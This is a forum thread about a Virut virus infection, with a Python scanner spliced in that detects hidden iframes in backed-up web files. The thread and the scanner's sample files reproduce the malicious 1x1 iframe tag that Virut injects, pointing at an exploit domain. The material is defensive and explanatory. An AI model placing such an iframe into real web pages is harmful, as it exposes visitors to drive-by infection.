
Re: Cannot remove this virus which started with Win32:JunkPoly [Cryp]?


This is why my first and only suggestion when I see Virut is to reformat and reinstall. Until then you can never be sure whether the computer is clean or not.

Stay away from warez. It only takes one click and it's all over.

Virut adds one or more iframe tags to any HTML file it finds to redirect users to an exploit site.

Edit any HTML file on the infected computer and you'll see something like this at the bottom:

Code:
<- iframe src="http://ZieF,pl/rc/" width=1 height=1 style="border:'<- / iframe>',0Dh,0Ah

Virut makes similar changes to other file types such as .PHP, .ASP and .HTM, and is very hard for scanners to detect. So FYI, don't bring web documents over in the backup when this infection finally brings you to your knees.

The most damning property of Virut is that it is polymorphic: it changes slightly with each replication, allowing some of the infected files to elude scanners. So if you scan your system with a boot CD repeatedly and follow up with a repair install, you may get Virut to lie low for a while, but there is likely a file somewhere on your machine that will inevitably be activated before long, starting the entire infection over again.

Trying to remove Virut is an effort in futility, which is why evilfantasy and virtually every other malware expert who has experience with this infection will tell you that your only option is to reformat and reinstall, and to be careful what you transfer from your previous installation.

But feel free to keep trying. You'll just end up learning the hard way like I did.
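The post above describes the artifact Virut leaves behind: a tiny (1x1) iframe pointing at an exploit site, appended after the real content of .html, .htm, .php and .asp files. The following is an added example, not code from the original post, of the check a practitioner would run over a backup before restoring web documents. The sample files are constructed here from the tag quoted in the post; nothing is fetched from the network, and the `scan_text`/`scan_tree` names are this example's own.

```python
import re
from pathlib import Path

# Constructed sample files (written for this example; not files from the thread).
# The injected tag mirrors the one quoted in the post: a 1x1 iframe appended
# after the real content, CRLF-terminated (the 0Dh,0Ah in the quote).
SAMPLES = {
    "index.html": (
        "<html><body><p>Hello</p></body></html>\r\n"
        '<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>\r\n'
    ),
    "login.php": (
        "<?php echo 'ok'; ?>\n"
        "<IFRAME SRC='http://ZieF.pl/rc/' WIDTH=1 HEIGHT=1 STYLE='visibility:hidden'></IFRAME>\n"
    ),
    "clean.htm": (
        '<html><body><iframe src="https://example.com/widget" width=300 height=200>'
        "</iframe></body></html>\n"
    ),
}

# File types the post says Virut touches.
WEB_EXTS = {".html", ".htm", ".php", ".asp"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HTML_CLOSE_RE = re.compile(r"</html\s*>", re.IGNORECASE)


def parse_attrs(tag: str) -> dict:
    """Return lower-cased attribute name -> value for one start tag."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        name = m.group(1).lower()
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[name] = value.strip()
    return attrs


def is_suspicious(attrs: dict) -> bool:
    """A 1x1 / 0x0 or explicitly hidden iframe is the classic drive-by pattern."""
    tiny = attrs.get("width") in {"0", "1"} and attrs.get("height") in {"0", "1"}
    style = attrs.get("style", "").replace(" ", "").lower()
    hidden = "visibility:hidden" in style or "display:none" in style
    return tiny or hidden


def scan_text(text: str) -> list:
    """Return one finding per suspicious iframe: (src, appended_after_html_close)."""
    close = HTML_CLOSE_RE.search(text)
    close_end = close.end() if close else None
    findings = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(0))
        if is_suspicious(attrs):
            # Virut appends its tag at the very end, i.e. after </html>.
            trailing = close_end is not None and m.start() >= close_end
            findings.append((attrs.get("src", ""), trailing))
    return findings


def scan_tree(root: Path) -> dict:
    """Walk a backup and report suspicious iframes per web document."""
    report = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            try:
                text = path.read_text(encoding="utf-8", errors="replace")
            except OSError:
                continue
            hits = scan_text(text)
            if hits:
                report[str(path.relative_to(root))] = hits
    return report


if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for name, body in SAMPLES.items():
            (root / name).write_text(body, encoding="utf-8")
        for rel, hits in scan_tree(root).items():
            for src, trailing in hits:
                where = "appended after </html>" if trailing else "inside document"
                print(f"{rel}: hidden iframe -> {src} ({where})")
```

Point `scan_tree` at the mounted backup rather than the live system: a file that has been reinfected by a later run of the virus will show the same trailing tag, and a file with no finding is only as clean as this one heuristic, so it complements, rather than replaces, the reformat-and-reinstall advice above.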
Quote from: evilfantasy on April 23, 2009, 12:58:19 PM

Great post astrosoup and welcome to CH.
That site is known to give you Bloodhound.Exploit.196, is blocked by Google and is rated extremely poorly on WOT. (Link from googling http://ZieF.pl/rc/; that link doesn't go to the site, for safety reasons.)

For more information go to http://www.google.com/safebrowsing/diagnostic?site=http://zief.pl/rc/&hl=en

Visiting a site that has been injected with the iframe code while using the NoScript addon for Firefox will not affect you, as NoScript blocks iframes. But going to the actual website will infect you.

I wonder if viewing the page source will get me infected.

It's definitely a nasty site. Does a lot of damage. http://www.threatexpert.com/report.aspx?md5=71eb4db6da3338655c1ec3cb48489d03
Quote from: astrosoup on April 23, 2009, 12:54:04 PM
So if you scan your system with a boot cd repeatedly and follow up with a repair install, you may get virut to low for a while, but there is likely a file somewhere on your machine that will inevitably be activated before long, starting the entire infection over again.
Like I said, I did not perform a reinstall and deleted all the files from the previous system. The current system is a fresh install, and I previously formatted the current system partition. All I did was keep other files, which were not infected according to the Kaspersky tool.

Quote from: astrosoup on April 23, 2009, 12:54:04 PM
Virut adds one or more iframe tags to any HTML file it finds to redirect users to an exploit site.

Edit any HTML file on the infected computer and you'll see something like this at the bottom:

Code:
<- iframe src="http://ZieF,pl/rc/" width=1 height=1 style="border:'<- / iframe>',0Dh,0Ah

Virut makes similar changes to other file types such as .PHP, .ASP and .HTM, and is very hard for scanners to detect. So FYI, don't bring web documents over in the backup when this infection finally brings you to your knees.
The iframe problem, mentioned in an earlier post, happened on my wife's computer while browsing. It was not a web file on the computer, and Avast blocked access to that page. That computer was not infected, and I scanned it just in case (no sign of Virut found, like I said).

Quote from: astrosoup on April 23, 2009, 12:54:04 PM
But feel free to keep trying. You'll just end up learning the hard way like I did.
If I get it again, from the files I have on my computer, I will let you know. But I'm not ready to throw away all I have as long as I don't have a reason just yet. I would delete infected files, but not those found not to be infected. Maybe I'm wrong, maybe not. I'll see and let you know.
